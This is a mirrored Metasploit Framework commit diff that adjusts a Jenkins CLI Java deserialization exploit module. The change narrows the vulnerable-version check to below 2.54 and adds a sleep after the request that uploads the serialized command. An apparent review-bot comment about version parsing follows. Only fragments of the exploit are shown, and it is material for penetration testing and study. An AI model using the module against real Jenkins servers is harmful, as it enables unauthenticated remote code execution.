mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-09 04:26:11 +02:00
change version check and add sleep
parent
e5c9439974
commit
d86f9427c9
@ -1,7 +1,7 @@
|
||||
## Vulnerable Application
|
||||
|
||||
An unauthenticated Java object deserialization vulnerability exists
|
||||
in the CLI component for Jenkins versions `v2.56` and below.
|
||||
in the CLI component for Jenkins versions below `v2.54`.
|
||||
|
||||
The `readFrom` method within the `Command` class in the Jenkins
|
||||
CLI remoting component deserializes objects received from clients without
|
||||
|
@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
return Exploit::CheckCode::Safe('Version of Jenkins cannot be found.') unless version
|
||||
|
||||
vers_no = Gem::Version.new(version)
|
||||
return Exploit::CheckCode::Appears("Jenkins version #{version} detected") if vers_no <= Gem::Version.new('2.56')
|
||||
return Exploit::CheckCode::Appears("Jenkins version #{version} detected") if vers_no < Gem::Version.new('2.54')
|
||||
|
||||
Exploit::CheckCode::Detected
|
||||
end
|
||||
@ -120,7 +120,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
) # don't wait for response, and don't disconnect
|
||||
|
||||
cmd = build_obj(cmd)
|
||||
|
||||
send_request_cgi(
|
||||
{
|
||||
'uri' => sess_uri,
|
||||
@ -131,8 +130,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'Side' => 'upload',
|
||||
'Session' => sess_uuid
|
||||
}
|
||||
}, nil
|
||||
}
|
||||
)
|
||||
sleep(2)
|
||||
end
|
||||
|
||||
def build_obj(obj_data)
|
||||
|
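Review bot: In the check hunk (`@ -85,7 +85,7 @`), `Gem::Version.new(version)` raises `ArgumentError` when the reported string is not a well-formed version, so a host announcing a non-standard build string would make the check raise instead of returning a CheckCode. A guard before it, such as `return Exploit::CheckCode::Detected("Unparseable Jenkins version #{version}") unless Gem::Version.correct?(version)`, keeps the result well-defined. The verdict also rests on the reported version alone: any build numbered below 2.54 returns `Appears` even if it carries a backported fix, and every version from 2.54 up falls through to `Detected` rather than `Safe`. A short comment, for example `# version-only check; 2.54 and later fall through to Detected because <reason>`, would tell whoever triages the results why that cut-off was chosen. The method starts above this hunk, so where `version` is read from is not visible here.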